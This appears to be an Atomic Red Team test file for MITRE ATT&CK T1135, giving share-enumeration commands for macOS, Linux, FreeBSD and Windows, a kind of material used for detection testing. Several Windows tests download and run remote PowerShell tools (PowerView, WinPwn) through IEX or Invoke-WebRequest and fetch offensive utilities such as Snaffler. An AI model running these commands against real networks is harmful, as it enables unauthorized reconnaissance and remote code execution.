attack_technique: T1135 display_name: Network Share Discovery atomic_tests: - name: Network Share Discovery auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7 description: | Network Share Discovery supported_platforms: - macos input_arguments: computer_name: description: Computer name to find a mount on. type: string default: computer1 executor: command: | df -aH smbutil view -g //#{computer_name} showmount #{computer_name} name: sh - name: Network Share Discovery - linux auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae description: | Network Share Discovery using smbstatus supported_platforms: - linux input_arguments: package_checker: description: Package checking command. Debian - dpkg -s samba type: string default: (rpm -q samba &>/dev/null) || (dpkg -s samba | grep -q installed) package_installer: description: Package installer command. Debian - apt install samba type: string default: (which yum && yum -y install epel-release samba)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y samba) dependency_executor_name: bash dependencies: - description: | Package with smbstatus (samba) must exist on device prereq_command: | if #{package_checker} > /dev/null; then exit 0; else exit 1; fi get_prereq_command: | #{package_installer} executor: command: | smbstatus --shares name: bash elevation_required: true - name: Network Share Discovery - FreeBSD auto_generated_guid: 77e468a6-3e5c-45a1-9948-c4b5603747cb description: | Network Share Discovery using smbstatus supported_platforms: - linux input_arguments: package_checker: description: Package checking command. pkg info -x samba type: string default: (pkg info -x samba &>/dev/null) package_installer: description: Package installer command. pkg install -y samba413 type: string default: (which pkg && pkg install -y samba413) dependency_executor_name: sh dependencies: - description: | Package with smbstatus (samba) must exist on device prereq_command: | if #{package_checker} > /dev/null; then exit 0; else exit 1; fi get_prereq_command: | #{package_installer} executor: command: | smbstatus --shares name: sh elevation_required: true - name: Network Share Discovery command prompt auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb description: | Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host Upon execution available network shares will be displayed in the powershell session supported_platforms: - windows input_arguments: computer_name: description: Computer name to find a mount on. type: string default: localhost executor: command: | net view \\#{computer_name} name: command_prompt - name: Network Share Discovery PowerShell auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb description: | Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host Upon execution, available network shares will be displayed in the powershell session supported_platforms: - windows executor: command: | get-smbshare name: powershell - name: View available share drives auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae description: View information about all of the resources that are shared on the local computer Upon execution, available share drives will be displayed in the powershell session supported_platforms: - windows executor: command: | net share name: command_prompt - name: Share Discovery with PowerView auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd description: | Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: | Endpoint must be joined to domain prereq_command: | if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1} get_prereq_command: | "Join system to domain" executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose name: powershell - name: PowerView ShareFinder auto_generated_guid: d07e4cc1-98ae-447e-9d31-36cb430d28c4 description: PowerView is a PowerShell tool to gain network situational awareness on Windows domains. ShareFinder finds (non-standard) shares on machines in the domain. supported_platforms: - windows input_arguments: parameters: description: ShareFinder parameter type: string default: -CheckShareAccess dependencies: - description: Invoke-ShareFinder module must exist in %TEMP% directory prereq_command: | if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1" executor: command: | Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1" Invoke-ShareFinder #{parameters} name: powershell - name: WinPwn - shareenumeration auto_generated_guid: 987901d1-5b87-4558-a6d9-cffcabc638b8 description: Network share enumeration using the shareenumeration function of WinPwn supported_platforms: - windows executor: command: |- iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') shareenumeration -noninteractive -consoleoutput name: powershell - name: Network Share Discovery via dir command auto_generated_guid: 13daa2cf-195a-43df-a8bd-7dd5ffb607b5 description: | Network Share Discovery utilizing the dir command prompt. The computer ip variable may need to be modified to point to a different host ip Upon execution available network shares will be displayed in the commandline session supported_platforms: - windows input_arguments: computer_ip: description: Computer IP to find a mount on. type: string default: 127.0.0.1 executor: command: | dir \\#{computer_ip}\c$ dir \\#{computer_ip}\admin$ dir \\#{computer_ip}\IPC$ name: command_prompt - name: Enumerate All Network Shares with SharpShares auto_generated_guid: d1fa2a69-b0a2-4e8a-9112-529b00c19a41 description: | SharpShares is a command line tool that can be integrated with Cobalt Strike's execute-assembly module, allowing for the enumeration of network shares. This technique has been utilized by various ransomware groups, including BianLian. [Reference](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a) supported_platforms: - windows input_arguments: output_path: description: File to output enumeration results to type: String default: '$env:temp\T1135SharpSharesOutput.txt' sharp_path: description: Path to the SharpShares executable type: String default: PathToAtomicsFolder\..\ExternalPayloads\SharpShares.exe dependency_executor_name: powershell dependencies: - description: The SharpShares executable must exist on disk prereq_command: if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SharpShares.exe") {exit 0} else {exit 1} get_prereq_command: |- New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://github.com/mitchmoser/SharpShares/releases/download/v2.4/SharpShares.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SharpShares.exe" executor: command: cmd /c '#{sharp_path}' /ldap:all | out-file -filepath "#{output_path}" cleanup_command: remove-item "#{output_path}" -force -erroraction silentlycontinue name: powershell elevation_required: false - name: Enumerate All Network Shares with Snaffler auto_generated_guid: b19d74b7-5e72-450a-8499-82e49e379d1a description: | Snaffler is an open-source tool that has been used by various threat groups, including Scattered Spider/Muddled Libra, to enumerate accessible shares and credential-containing files within a domain. [Reference](https://unit42.paloaltonetworks.com/muddled-libra/) supported_platforms: - windows input_arguments: output_path: description: File to output enumeration results to type: String default: '$env:temp\T1135SnafflerOutput.txt' snaffler_path: description: Path to the Snaffler executable type: String default: PathToAtomicsFolder\..\ExternalPayloads\Snaffler.exe dependency_executor_name: powershell dependencies: - description: The Snaffler executable must exist on disk prereq_command: if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Snaffler.exe") {exit 0} else {exit 1} get_prereq_command: |- New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://github.com/SnaffCon/Snaffler/releases/download/1.0.150/Snaffler.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Snaffler.exe" executor: command: | invoke-expression 'cmd /c start powershell -command { cmd /c "#{snaffler_path}" -a -o "#{output_path}" }; start-sleep 90; stop-process -name "snaffler"' cleanup_command: remove-item "#{output_path}" -force -erroraction silentlycontinue name: powershell elevation_required: false